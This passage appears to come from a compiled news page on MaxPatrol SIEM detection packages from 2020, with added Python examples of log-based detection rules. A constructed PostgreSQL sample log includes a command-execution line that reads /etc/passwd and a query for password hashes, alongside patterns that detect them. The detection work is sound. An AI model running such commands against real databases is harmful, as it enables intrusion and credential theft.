  • changing the authentication method to increase the chance of compromising a user or role;
  • disabling the row-level security policy of a table;
  • disabling connection encryption (SSL);
  • reloading the server configuration;
  • running built-in operating system utilities that can execute arbitrary commands.
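All of the actions above leave a trace in the PostgreSQL statement log when statement logging is enabled. The following Python is an added example, not MaxPatrol SIEM code, of matching logged statements against those actions; it assumes log_statement = 'all' with log_line_prefix = '%m [%p] %u@%d ', and the sample log and the rule patterns (one possible reading of each listed action) are constructed for the example:

```python
"""Classify PostgreSQL statement log lines against the suspicious actions listed above.

Added example, not MaxPatrol SIEM code. Assumes log_statement = 'all' and
log_line_prefix = '%m [%p] %u@%d '; the sample log is constructed, and each
rule pattern is one possible reading of the listed action.
"""
import re

LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \S+ \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+statement: (?P<sql>.*)$"
)

# Rule name -> pattern over the normalized (lower-case, comment-free) statement text.
RULES = [
    ("version probe",          r"\bversion\s*\(\s*\)|\bshow\s+server_version\b"),
    ("password hash read",     r"\b(pg_authid|pg_shadow)\b"),
    ("audit disabled",         r"\b(pgaudit\.log|log_statement)\s*=\s*'?none'?"),
    ("audit severity changed", r"\bpgaudit\.log_level\s*="),
    ("auth method weakened",   r"\bpassword_encryption\s*=\s*'?md5'?|\bpg_hba\.conf\b"),
    ("row security disabled",  r"\bdisable\s+row\s+level\s+security\b"),
    ("ssl disabled",           r"\bssl\s*=\s*'?(off|false|0)'?\b"),
    ("config reloaded",        r"\bpg_reload_conf\s*\("),
    ("os command execution",   r"\bcopy\b.*\b(from|to)\s+program\b"),
]
COMPILED = [(name, re.compile(pat)) for name, pat in RULES]


def normalize(sql):
    """Strip SQL comments and collapse whitespace so SELECT/**/version() still matches."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"--[^\n]*", " ", sql)
    return re.sub(r"\s+", " ", sql).strip().lower()


def classify_statement(sql):
    """Return the names of all rules the statement matches, in RULES order."""
    text = normalize(sql)
    return [name for name, rx in COMPILED if rx.search(text)]


def scan(log_text):
    """Parse statement log lines and return one finding per matched (line, rule) pair."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # continuation lines of multi-line statements are not handled here
        for rule in classify_statement(m["sql"]):
            findings.append({"ts": m["ts"], "user": m["user"], "db": m["db"], "rule": rule, "sql": m["sql"]})
    return findings


# Constructed sample: an attacker on the "app" role works through the listed actions.
SAMPLE_LOG = """\
2020-11-05 10:12:01.123 UTC [4711] app@shop LOG:  statement: SELECT/**/version()
2020-11-05 10:12:03.001 UTC [4711] app@shop LOG:  statement: SELECT rolname, rolpassword FROM pg_authid
2020-11-05 10:12:05.500 UTC [4711] app@shop LOG:  statement: ALTER SYSTEM SET pgaudit.log = 'none'
2020-11-05 10:12:06.200 UTC [4711] app@shop LOG:  statement: ALTER SYSTEM SET ssl = off
2020-11-05 10:12:07.000 UTC [4711] app@shop LOG:  statement: SELECT pg_reload_conf()
2020-11-05 10:12:09.000 UTC [4711] app@shop LOG:  statement: ALTER TABLE accounts DISABLE ROW LEVEL SECURITY
2020-11-05 10:12:11.000 UTC [4711] app@shop LOG:  statement: COPY cmd_out FROM PROGRAM 'id; cat /etc/passwd'
2020-11-05 10:12:15.000 UTC [4712] reporting@shop LOG:  statement: SELECT count(*) FROM orders WHERE status = 'paid'
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['user']}@{f['db']}: {f['rule']}: {f['sql']}")
```

Comment stripping is the point of normalize(): SELECT/**/version() is the same probe as SELECT version() to the server, so the rule must not be evadable by a comment. The obvious gap is that the attacker's first move may be to turn statement logging off, which is why the list above treats disabling the audit itself as an alert.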

Each of these actions requires investigation.

This is the third examination package in MaxPatrol SIEM, created to detect suspicious activity in the DBMS. Previously, MaxPatrol SIEM loaded rule sets to detect attacks on Oracle Database and Microsoft SQL Server.

Third examination package for detecting attacks on Linux operating systems

A third expertise package for detecting attacks on Linux operating systems has been loaded into the MaxPatrol SIEM incident detection system. It detects actions that may indicate compromise of a system and development of an attack on the organization's IT infrastructure, Positive Technologies reported on August 24, 2020.

This series of rules complements the two previous packages for Linux systems, which detect suspicious network activity and changes to system objects. The package's threat detection rules let MaxPatrol SIEM users identify local reconnaissance after logon to a Linux system, viewing of the contents of other users' home directories, execution of privilege escalation commands, and the use of hacking utilities to develop the attack further.

Linux is a popular operating system in cloud services, supercomputers and web servers. According to a W3Techs study, Linux runs 70% of websites among the 10 million most popular domains by Alexa ranking. Such servers can become an attacker's entry point into the organization's network if the web applications deployed on them are vulnerable.

"The presented expertise package extends coverage of the MITRE ATT&CK matrix and strengthens another layer of protection for Linux systems," said Kirill Antonenko, head of the Unix-family systems security department at Positive Technologies. - Attackers can get into a system in various ways that are hard to distinguish from legitimate user actions and that do not trigger SIEM systems. But if they start local reconnaissance, try to elevate privileges, gain a foothold in the system or develop the attack, the correlation rules in the last two packages will help identify and stop the attack in time."

The expertise package is available to MaxPatrol SIEM version 6.0 users. The package is installed automatically when the Positive Technologies Knowledge Base is updated.

Integration with Dr.Web Enterprise Security Suite 9-12

Companies that use Dr.Web Enterprise Security Suite products and detect information security incidents with MaxPatrol SIEM can connect current versions of Dr.Web solutions as data sources for security monitoring, Positive Technologies announced on August 5, 2020.

Download a package to detect suspicious events from network devices

The twentieth expertise package has been loaded into the MaxPatrol SIEM incident detection system, Positive Technologies announced on July 23, 2020. It detects seven suspicious activities based on analysis of events from network devices, helping MaxPatrol SIEM users localize attacks quickly, before data leaks, equipment failures or malware launches.

Event sources can be Cisco routers and switches, Check Point firewalls running the GAiA operating system, Cisco ASA, FortiGate, Palo Alto Networks PAN-OS and Juniper Junos OS devices. MaxPatrol SIEM now detects the following potentially dangerous network activities:

  • attempts to exploit CVE-2018-0156 in Cisco Smart Install, the feature that automates the initial deployment of the operating system image on some Cisco switches. Through this vulnerability an unauthenticated attacker can reload the equipment, change its settings and cause a temporary denial of service;
  • connections to third-party mail services, which may be prohibited by the organization's security policy;
  • authentication errors in FHRP protocols (first-hop redundancy protocols). The error occurs on misconfiguration of network equipment or during an attack on FHRP; a successful attack gives the attacker access to the organization's network traffic;
  • SNMP information requests, which indicate that an attacker is trying to guess the password for access to the equipment or to gather information about the enterprise network;
  • fragmented UDP traffic. Fragmentation is often used to bypass intrusion detection systems, so fragmented packets should be filtered;
  • connections to external VPN servers. Tunnels from the corporate network may indicate a perimeter breach and attempts by the attacker to send information out of the attacked host;
  • use of third-party DNS servers. Through DNS attackers can redirect traffic to their own resources, and DNS can also serve as a command channel for malware.
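The two network-device packages on this page (the August 2021 indicators of compromise described above and the seven activities just listed) both come down to allowlists and thresholds evaluated over normalized events. The following Python is an added example, not MaxPatrol SIEM code, of that logic; the address lists, the management port list (including the assumed ports for MikroTik Winbox and Check Point CPMI) and the events are constructed for the example:

```python
"""Allowlist and threshold rules over normalized network events.

Added example, not MaxPatrol SIEM code. The address lists, the management
port list and the events are constructed; in practice the events would come
from firewall, router and switch logs or from flow records.
"""
from ipaddress import ip_address, ip_network

INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
NETWORK_DEVICES = {"10.0.0.1", "10.0.0.2", "10.0.0.3"}  # ASA, Check Point management server, MikroTik
ADMIN_HOSTS = {"10.10.0.5", "10.10.0.6"}                  # tabular list: nodes allowed to administer devices
SNMP_POLLERS = {"10.10.0.20"}                             # monitoring hosts that may query SNMP
CORP_DNS = {"10.10.0.53", "10.10.0.54"}                   # the only resolvers clients should use
MGMT_PORTS = {22, 23, 443, 8291, 18190}  # ssh, telnet, https, MikroTik Winbox, Check Point CPMI (assumed list)
MAIL_PORTS = {25, 465, 587, 110, 143, 993, 995}
VPN_PORTS = {500, 4500, 1194, 1723, 51820}
ICMP_MAX_BYTES = 1024  # echo payloads above this are unusual enough to look at


def is_internal(ip):
    """True if the address belongs to one of the organization's internal ranges."""
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def evaluate(ev):
    """Return the names of the rules one normalized event triggers (possibly several)."""
    src, dst, proto = ev["src"], ev["dst"], ev["proto"]
    dport, size = ev.get("dport"), ev.get("bytes", 0)
    hits = []
    # Device administration (SmartConsole, Winbox, ssh, https) only from the listed admin nodes.
    if dst in NETWORK_DEVICES and dport in MGMT_PORTS and src not in ADMIN_HOSTS:
        hits.append("device administration from untrusted node")
    # SNMP from anything but the monitoring servers: community-string guessing or network mapping.
    if proto == "udp" and dport == 161 and src not in SNMP_POLLERS:
        hits.append("SNMP query from unexpected host")
    # Oversized ICMP can carry exfiltrated data or payloads.
    if proto == "icmp" and size > ICMP_MAX_BYTES:
        hits.append("large ICMP packet")
    # Name resolution must go through the corporate resolvers, wherever the other server is.
    if dport == 53 and dst not in CORP_DNS:
        hits.append("third-party DNS server")
    # Mail and VPN tunnels from inside to outside the perimeter.
    if is_internal(src) and not is_internal(dst):
        if dport in MAIL_PORTS:
            hits.append("third-party mail service")
        if dport in VPN_PORTS or proto == "esp":
            hits.append("external VPN server")
    return hits


def scan(events):
    """Pair each event with the rules it triggered, skipping clean events."""
    flagged = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            flagged.append((ev, hits))
    return flagged


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"src": "10.10.0.5",   "dst": "10.0.0.2",     "proto": "tcp",  "dport": 18190},  # admin node -> Check Point: fine
    {"src": "10.20.7.44",  "dst": "10.0.0.2",     "proto": "tcp",  "dport": 18190},  # workstation -> Check Point
    {"src": "10.20.7.44",  "dst": "10.0.0.3",     "proto": "tcp",  "dport": 8291},   # workstation -> MikroTik Winbox
    {"src": "10.20.7.44",  "dst": "10.0.0.1",     "proto": "udp",  "dport": 161},    # SNMP from a non-poller
    {"src": "10.10.0.20",  "dst": "10.0.0.1",     "proto": "udp",  "dport": 161},    # SNMP from the poller: fine
    {"src": "10.20.7.44",  "dst": "10.0.0.1",     "proto": "icmp", "bytes": 1400},   # oversized echo
    {"src": "10.20.7.44",  "dst": "10.10.0.53",   "proto": "udp",  "dport": 53},     # corporate DNS: fine
    {"src": "10.20.7.44",  "dst": "8.8.8.8",      "proto": "udp",  "dport": 53},     # third-party DNS
    {"src": "10.20.7.44",  "dst": "203.0.113.25", "proto": "tcp",  "dport": 587},    # external mail submission
    {"src": "10.20.7.44",  "dst": "203.0.113.9",  "proto": "udp",  "dport": 4500},   # IKE NAT-T to an external VPN
    {"src": "203.0.113.9", "dst": "10.0.0.1",     "proto": "tcp",  "dport": 443},    # management from the Internet
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"{ev['src']} -> {ev['dst']} {ev['proto']}/{ev.get('dport', '-')}: {', '.join(hits)}")
```

Eight of the eleven sample events are flagged. The lists at the top are the part that needs maintenance: ADMIN_HOSTS, SNMP_POLLERS and CORP_DNS are exactly the kind of tabular list a SIEM operator extends when adding an exception for a legitimate host, and an entry missing from them is the usual source of false positives.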

Network attacks are not very popular with attackers because they are difficult to execute. However, in our experience they occur as one of the stages of a targeted attack and pose a serious threat to organizations in their consequences, - comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department at Positive Technologies. - Previously, a package for detecting network anomalies during remote work was loaded into MaxPatrol SIEM. Now MaxPatrol SIEM covers even more attacker tactics. We plan to gradually expand the set of correlation rules for detecting anomalous network activity.

Download the Privilege Escalation and Control Malware Detection Package

An expertise package has been loaded into the MaxPatrol SIEM incident detection system that identifies attackers at the stage when they communicate with compromised machines or try to elevate privileges to the administrator level in order to develop the attack. Positive Technologies announced this on June 29, 2020.

The rules in the nineteenth package detect techniques from the Privilege Escalation and Command and Control tactics of the MITRE ATT&CK model. It is the sixth package with attack detection rules based on MITRE ATT&CK; the ATT&CK matrix describes 12 tactics in total.

The use of privilege escalation techniques indicates attempts by attackers to obtain higher-level permissions in the attacked system. To do this they exploit configuration errors and vulnerabilities. "Command and Control" techniques are used when attackers need to communicate with the systems they control in the victim's network, - comments Anton Tyurin, head of the expert security services department at Positive Technologies (PT Expert Security Center). - To hide their traces, attackers mimic normal behavior in traffic and use built-in operating system tools. The presented package will help specialists detect these actions and act in time.

The package includes detection rules for the following suspicious actions: creation of a malicious library, launch of executable files on behalf of another user, launch of a command line on behalf of the system account, download and launch of malware, port proxying, and an illegitimate Internet connection initiated by executable files. Detecting these actions in time stops attackers' progress and prevents them from gaining a foothold in the infrastructure.

Positive Technologies experts have also updated the packages covering the execution and persistence tactics. Users can now identify attackers' attempts to use standard Windows applications for illegitimate actions and to spoof or modify executable files.

Appearance in MaxPatrol SIEM 6 checklist for quick product setup

On June 23, 2020, Positive Technologies announced the release of the sixth version of the MaxPatrol SIEM security incident detection system. Product developers continue to reduce the labor costs of specialists to work in SIEM systems. To do this, they added a checklist to the next version to customize the product, made it easier to work with false positives and improved notifications.

According to a survey by Positive Technologies, 25% of specialists spend two to four hours daily in SIEM systems, and 22% of respondents spend more than half of the working day. Moreover, 62% of respondents noted that over the past year this time has increased.

Over the past year our efforts have been aimed at giving the product as many functions as possible to reduce the requirements for specialists working with it and reduce their labor costs. In particular, we supply the product monthly with expertise packages of ready-made correlation rules, added a designer for writing one's own rules, and in the new version released a checklist for configuring the system and simplified handling of false positives, - comments Alexey Andreev, Managing Director of the Research and Development Department at Positive Technologies.

So that MaxPatrol SIEM users can get a running system without studying a lot of documentation, a configuration checklist has appeared in the new version. It has 11 steps required to start the system; each step has instructions and links to detailed materials.

The most laborious task when working in a SIEM is handling false positives. MaxPatrol SIEM 6 users can add exceptions to threat detection rules in a couple of clicks, quickly eliminating recurring false positives: the user marks in the event the parameters the rule should no longer react to, for example the address of a network node or the name of a specific user.

Another change: now MaxPatrol SIEM users will receive notifications about the need to configure the system or about new examination packages - right in the interface. By clicking on such a notification, the user will see the corresponding section of the product. New examination packages are now marked with a special marker.

In the new version, users can create widgets from tabular lists. This helps track updates to lists and respond quickly when necessary, for example by monitoring the list of employees whose accounts were active at night or on weekends, or the list of email addresses from which employees receive a lot of spam.

This version also adds support for Windows Server 2016 and Windows Server 2019 for deploying MaxPatrol SIEM.

SIEM systems have become one of the key technologies in providing information security and the main tool for the work of security operations centers (SOC). The number of companies using MaxPatrol SIEM has reached 260 over the past five years. In Positive Technologies' overall 2019 financial result, MaxPatrol SIEM accounts for about 30%.

Launch of CyberART event monitoring services based on MaxPatrol SIEM

Cyber defense services operator CyberART (part of the InnoSTage Group of Companies) has launched commercial information security event monitoring services based on MaxPatrol SIEM. InnoSTage announced this on June 8, 2020.

Download a package to identify attempts to pin attackers to Linux-based infrastructures

An examination package designed to identify suspicious changes to system objects on nodes running Linux-family operating systems has been loaded into the MaxPatrol SIEM incident detection system. MaxPatrol SIEM users can now detect the actions of an attacker who has already penetrated the IT infrastructure: attempts to gain a foothold in it, elevate privileges or hide traces. Positive Technologies announced this on May 27, 2020.

Linux systems are a target for attackers: they often act as web servers or may contain business-critical assets, for example SAP or 1C databases. Attackers' interest in them is also explained by the fact that Linux systems are, as a rule, deployed on the perimeter of the organization, so compromising them often leads attackers straight into the internal network. To help companies with Linux infrastructure ensure its security, Positive Technologies experts have developed a set of specific ways to detect threats.

An expertise package for identifying attacks on Linux operating systems had already been loaded into the MaxPatrol SIEM incident detection system earlier. The updated series of detection rules complements the previous ones.

The rules included in the eighteenth examination package detect the use of Credential Access and Persistence techniques from the MITRE ATT&CK matrix and help detect attempts by intruders to:

  • obtain information that allows logging into the system on behalf of a legitimate user (for example, the SSH keys of an OS user);
  • modify system files, such as OS startup scripts, OS configuration files, system libraries or executable files, to ensure continuous, unobstructed access (a backdoor) to a compromised system or to elevate privileges.

Thus, users will be able to detect an attacker who has already entered the system and detect his further progress. Detecting suspicious changes to system objects may be the last opportunity to notice an attacker on a particular system. Otherwise, cybercriminals will be able to get all the necessary privileges in order to securely gain a foothold, and then it will become almost impossible to detect them.

In addition, Positive Technologies experts updated the previous examination package; the changes concern the convenience of working with the rules when processing incidents.

Solar JSOC identifies ten targeted attacks with MaxPatrol SIEM

On May 13, 2020, Rostelecom-Solar announced that Solar JSOC had identified ten targeted attacks using MaxPatrol SIEM.

Loading a package of suspicious network activity scenarios for remote access via Palo Alto Networks

On May 8, 2020, Positive Technologies announced that the examination package for detecting network anomalies during remote work received a second update. It now covers five more scenarios, including cases of suspicious network activity when organizing remote access using the Palo Alto Networks firewall.

According to a survey of IT and information security specialists conducted by Positive Technologies, the Palo Alto Networks firewall is one of the five most popular ways to organize remote access in large companies. Therefore, Positive Technologies specialists developed rules for detecting threats that are relevant for such a system, and loaded them into MaxPatrol SIEM.

Now MaxPatrol SIEM detects brute-force attacks on the VPN subsystem of the Palo Alto firewall (this can prevent attackers from guessing the password used to connect to the corporate network) and detects duplicate VPN connections to the firewall, which indicate illegitimate access.

For those companies where remote access is organized using the Palo Alto firewall or other popular firewalls, the scenario of identifying direct VPN connections between two client nodes is relevant. Such suspicious activity, among other things, indicates that the employee's device is compromised from an external network.

In a month, we managed to collect a set of rules to identify anomalies in the operation of the most popular systems for organizing remote access: OpenVPN, RDG, Cisco ASA, Check Point and Palo Alto firewalls. Taking into account the two updates, the examination package covers 16 scenarios,
comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies

The update of the expertise package is also relevant for companies where remote access is organized using Remote Desktop Gateway. Now MaxPatrol SIEM detects cases when attackers move inside the network over RDP: the product detects connections via RDG to a network node from which there are RDP connections to other nodes. Prompt response to such activity will prevent the development of an attack within the network.

Another scenario that requires a prompt response and is identified using the examination package is the detection of repeated connections under the same username to a VPN server running Windows Server.
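Two of the remote-access scenarios described above (duplicate VPN sessions held by one account from different addresses, and RDP connections fanning out from a node that was itself reached via RDG), written out as plain correlation logic over constructed log events. This is an added example, not MaxPatrol SIEM's own rules or event schema; the event field names and the 30-minute chaining window are assumptions.

```python
"""Added example (not Positive Technologies code): two remote-access anomalies
implemented as correlation logic over constructed events.

Event field names (ts, event_type, user, src_ip, dst_ip) are assumptions made
for this example; they are not MaxPatrol SIEM's normalized schema.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Event:
    ts: datetime
    event_type: str   # "vpn_login", "vpn_logout", "rdg_connect", "rdp_connect"
    user: str
    src_ip: str
    dst_ip: str


def _t(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed sample log (not captured from a real system).
SAMPLE_EVENTS: List[Event] = [
    Event(_t("2020-05-08 09:00:00"), "vpn_login",   "a.ivanov",  "198.51.100.7",  "203.0.113.1"),
    Event(_t("2020-05-08 09:05:00"), "vpn_login",   "a.ivanov",  "192.0.2.44",    "203.0.113.1"),  # second concurrent session
    Event(_t("2020-05-08 09:10:00"), "vpn_login",   "b.petrov",  "198.51.100.9",  "203.0.113.1"),
    Event(_t("2020-05-08 09:30:00"), "vpn_logout",  "b.petrov",  "198.51.100.9",  "203.0.113.1"),
    Event(_t("2020-05-08 09:31:00"), "vpn_login",   "b.petrov",  "198.51.100.9",  "203.0.113.1"),  # reconnect, not a duplicate
    Event(_t("2020-05-08 10:00:00"), "rdg_connect", "c.sidorov", "198.51.100.20", "10.0.0.15"),
    Event(_t("2020-05-08 10:03:00"), "rdp_connect", "c.sidorov", "10.0.0.15",     "10.0.0.31"),
    Event(_t("2020-05-08 10:04:00"), "rdp_connect", "c.sidorov", "10.0.0.15",     "10.0.0.32"),
    Event(_t("2020-05-08 11:00:00"), "rdg_connect", "d.orlova",  "198.51.100.21", "10.0.0.16"),
    Event(_t("2020-05-08 13:30:00"), "rdp_connect", "d.orlova",  "10.0.0.16",     "10.0.0.31"),  # outside the window
]


def detect_duplicate_vpn_sessions(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (user, existing_src_ip, new_src_ip) for every VPN login that arrives
    while the same account already has an open VPN session from another address."""
    open_sessions: Dict[str, str] = {}      # user -> src_ip of the open session
    findings: List[Tuple[str, str, str]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.event_type == "vpn_login":
            prev = open_sessions.get(ev.user)
            if prev is not None and prev != ev.src_ip:
                findings.append((ev.user, prev, ev.src_ip))
            open_sessions[ev.user] = ev.src_ip
        elif ev.event_type == "vpn_logout":
            open_sessions.pop(ev.user, None)   # session closed: a later login is a reconnect
    return findings


def detect_rdp_chain_via_rdg(events: List[Event],
                             window: timedelta = timedelta(minutes=30)) -> List[Tuple[str, str, List[str]]]:
    """Return (user, node_reached_via_rdg, [onward_rdp_targets]) when a node that was
    reached through RDG opens RDP connections to other nodes within `window`."""
    rdg_entries: Dict[str, datetime] = {}   # internal node reached via RDG -> time of entry
    owner: Dict[str, str] = {}              # internal node -> account that came in via RDG
    onward: Dict[str, List[str]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.event_type == "rdg_connect":
            rdg_entries[ev.dst_ip] = ev.ts
            owner[ev.dst_ip] = ev.user
        elif ev.event_type == "rdp_connect":
            entered = rdg_entries.get(ev.src_ip)
            if entered is not None and ev.ts - entered <= window and ev.dst_ip != ev.src_ip:
                onward[ev.src_ip].append(ev.dst_ip)
    return [(owner[node], node, targets) for node, targets in onward.items()]


if __name__ == "__main__":
    for f in detect_duplicate_vpn_sessions(SAMPLE_EVENTS):
        print("duplicate VPN session:", f)
    for f in detect_rdp_chain_via_rdg(SAMPLE_EVENTS):
        print("RDP chain via RDG:", f)
```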

MaxPatrol 8 Release

On May 7, 2020, Positive Technologies announced the release of the next version of the MaxPatrol 8 security control and compliance system. Internal testing conducted by Positive Technologies specialists confirmed that by optimizing scanning algorithms, the speed of the product in Compliance mode increased by an average of 30%.

One of the tasks of the MaxPatrol 8 development team was to reduce the time for generating reports. On internal tests on big data, it was possible to get an acceleration of about 30 times - by adding the ability to generate reports in individual processes (up to five at the same time), and thanks to the implemented fault tolerance mechanisms, report generation continues even with an abnormal kernel reboot.

MaxPatrol 8

The release includes functionality that is designed to simplify the work with the product and reduce manual configuration of the solution. For example, users can now select the required standards when setting up a scan profile. You can also include and exclude each data type separately when generating a report. In addition, when creating a scan schedule, you can set filtering by subnet membership - this will help separate asset inventory and vulnerability scanning.

The task of the development team is to speed up the checks. Updates have already been released that have increased product performance in Compliance mode. This is especially true in the case of large installations. At the same time, we are not going to stop and also plan to reduce the scan time in Audit mode,
comments Pavel Bukhtiyarov, MaxPatrol 8 Development Manager

As part of efforts to improve product performance on big data, the consolidation of scan results has been optimized: consolidation over the network has become twice as fast, and consolidation to a file about 50% faster. The results depend on the speed of the hard drive: the faster it is, the higher the performance.

In addition to releases with updated functionality, scheduled updates to MaxPatrol 8 are released twice a week: the vulnerability base is being replenished, support for new systems is being implemented, new security standards are being added and the existing expertise is being updated.

Download an examination package to detect suspicious activity on the network

On April 14, 2020, Positive Technologies announced that an examination package was loaded into MaxPatrol SIEM to identify suspicious activity on the network, which is especially important due to the remote work of users. The package covers nine anomalies requiring prompt investigation.

Due to the transition of companies to remote operation, attackers have more opportunities to penetrate the local network. In order to identify illegitimate connections across the company's perimeter in time, Positive Technologies experts released an examination package with a set of rules for quickly detecting signs of intruder activity.

Examples of anomalies that MaxPatrol SIEM now detects are:

  • network connections through tunnels,
  • attempts to connect to critical network segments,
  • duplicate remote sessions,
  • multiple failed attempts to connect to a host with OpenVPN,
  • multiple failed attempts to connect to a Cisco ASA firewall,
  • enabling an access rule on the local firewall to allow an RDP connection,
  • an RDP connection from a network node running a Unix-family OS,
  • adding a user account to a security-significant Windows group,
  • reconnecting via VPN to a Windows host.

Since threats related to remote operation are relevant for most companies, we decided to help them strengthen network security with our expertise. The examination package to identify suspicious activity on the network associated with the remote work of users will be replenished weekly, covering more and more possible attackers' techniques,
comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies

Positive Technologies conducts a special survey of IT and information security specialists to select priorities in developing ways to detect threats. First of all, experts will develop correlation rules for the most common systems for organizing remote access.

Loading Microsoft SQL Server Attack Detection Package

On April 6, 2020, Positive Technologies announced that the next examination package in MaxPatrol SIEM will help users identify suspicious activity in Microsoft SQL Server database management systems. The package includes rules that allow you to detect an attack at different stages - from reconnaissance in a compromised system to affecting individual processes in the DBMS and the system as a whole.

Microsoft SQL Server is used by 64% of large business and public sector companies. Since the DBMS stores critical company data (financial statements, personal data of customers and employees, information about suppliers and obligations), it can become a focus for cybercriminals. This is confirmed by Positive Technologies research: at the end of 2019, in 60% of all incidents the theft of information was the attackers' motive.

So that MaxPatrol SIEM users can identify the compromise of a Microsoft SQL database before losing critical data, Positive Technologies experts have prepared a special examination package. It includes 23 correlation rules for information security events, which detect suspicious activity such as: changing DBMS parameters that affect system security; obtaining logins and passwords of DBMS accounts; a high number of failed login attempts; creating a database backup; disabling auditing to hide actions; backing up a database encryption key or certificate; reading and editing the Windows registry.

We have already added the second examination package aimed at identifying attacks on popular DBMS. Our team monitors the current types of attacks on such systems so that MaxPatrol SIEM users can identify the fact of compromise before the attacker gains access to confidential data or disables the system and business processes,
comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies

Download a 55-rule package to identify signs of common cybercriminal tools

On March 19, 2020, Positive Technologies announced that the next (fifteenth) examination package with 55 rules was loaded into MaxPatrol SIEM to identify signs of the work of common cybercriminals' tools. Detection rules are aimed at detecting multifunctional tools - frameworks often used by attackers, including in targeted attacks. The expertise package will help MaxPatrol SIEM users identify the active actions of attackers on the network before they achieve the targets of the attack.

MaxPatrol SIEM

Attackers use frameworks to perform tasks at various stages of the attack, from gaining access to the network to stealing data and affecting the IT infrastructure. To do this, frameworks can use the built-in utilities of operating systems or run their own malicious modules.

The rules in the examination package detect the activity of individual modules of common tools. In particular, these tools include Cobalt Strike (used by cybercriminals for covert communication, phishing attacks and attacks through web applications, and for gaining a foothold on resources and extending their presence within the network; the Cobalt group attacked banks with it), Koadic and Sliver (freely distributed software with a large set of functions, from remote command execution to privilege escalation), SharpSploit (a set of post-exploitation tools), SharpWMI (software that uses the Windows Management Instrumentation mechanism to remotely execute commands through subscriptions to WMI events) and Rubeus (a tool for attacking infrastructure that uses the Kerberos protocol for authentication).

Our research on hacker frameworks shows that one tool can combine several approaches that complicate the detection of its work. One of the popular attack methods is living off the land, when attackers use legitimate tools that are already present in the attacked system to attack. The second method gaining popularity is bring your own land, when attackers create and deliver their own tools to the hacked node. We took these methods into account when developing detection rules that detect the activity of hacker tools at different stages, including at the time of launching their modules or sending commands,
comments Anton Tyurin, Head of Expert Services at PT Expert Security Center

MaxPatrol SIEM 5.1

On March 12, 2020, Positive Technologies released an updated version of the MaxPatrol SIEM incident detection system. Upgrading to MaxPatrol SIEM 5.1 will allow information security specialists to reduce response time to similar incidents, flexibly manage user roles and increase data processing speed.

MaxPatrol SIEM 5.1

According to the developer, the transition to the seventh version of the Elasticsearch database increased the speed of the product by more than a third. The previous version of MaxPatrol SIEM processed up to 30 thousand events per second (EPS); in the updated version the EPS figure exceeds 40 thousand per installation. Thanks to the Elasticsearch database architecture, MaxPatrol SIEM 5.1 users can quickly retrieve archived data and work with it without needing to restore events from backups.

MaxPatrol SIEM 5.1 introduced a flexible model for managing user roles. Whereas previously the system had two roles, Administrator and Operator, in the presented version SIEM administrators can create additional roles, granting or restricting access to certain product sections. This functionality is especially relevant for companies with a hierarchical or geographically distributed infrastructure, where users must be able to work only with data that belongs to their monitoring area, according to Positive Technologies.

According to the developer, the updated version of MaxPatrol SIEM has another way to detect an attack that occurred in the past. Previously, the system retrospectively detected incidents using compromise indicators, now it is also possible according to correlation rules (rules for detecting threats). So, by creating a new rule or downloading the next examination package, users can check the events received earlier for security threats in them.

The use and loading of examination packages has become more convenient. Two clicks are enough to install the package from the knowledge base, and a description of the package with recommendations for configuring and responding to incidents is available right in the product interface, Positive Technologies emphasized.

To help users reduce the labor cost of responding to similar suspicious events, MaxPatrol SIEM implemented the ability to configure their aggregation into one incident (previously incidents were merged only automatically). To do this, the user needs to set aggregation conditions for any event parameters. For example, several consecutive responses to attempts to match a password to one account can be set as one incident.
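The aggregation described above, as an added example that is not MaxPatrol SIEM code: repeated rule responses with the same key (here rule name and target account) are folded into one incident when they arrive within a configurable window, so a burst of password-guessing alerts against one account becomes a single incident. The alert fields and the 10-minute default window are assumptions made for this example.

```python
"""Added example (not Positive Technologies code): folding repeated
correlation-rule responses into incidents by user-defined aggregation
conditions. Alert field names and the window length are assumptions."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple


@dataclass
class Alert:
    ts: datetime
    rule: str
    account: str
    src_ip: str


@dataclass
class Incident:
    rule: str
    account: str
    first_seen: datetime
    last_seen: datetime
    alerts: List[Alert] = field(default_factory=list)
    sources: Set[str] = field(default_factory=set)   # distinct source addresses seen


def _t(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed alerts: a password-guessing burst against one account from two
# addresses, one alert against another account, and a much later alert against
# the first account again.
SAMPLE_ALERTS: List[Alert] = [
    Alert(_t("2020-03-12 10:00:00"), "password_guessing", "j.doe", "198.51.100.5"),
    Alert(_t("2020-03-12 10:00:30"), "password_guessing", "j.doe", "198.51.100.5"),
    Alert(_t("2020-03-12 10:01:10"), "password_guessing", "j.doe", "203.0.113.9"),
    Alert(_t("2020-03-12 10:05:00"), "password_guessing", "j.doe", "198.51.100.5"),
    Alert(_t("2020-03-12 10:05:30"), "password_guessing", "admin", "203.0.113.9"),
    Alert(_t("2020-03-12 11:00:00"), "password_guessing", "j.doe", "198.51.100.5"),
]


def aggregate(alerts: List[Alert],
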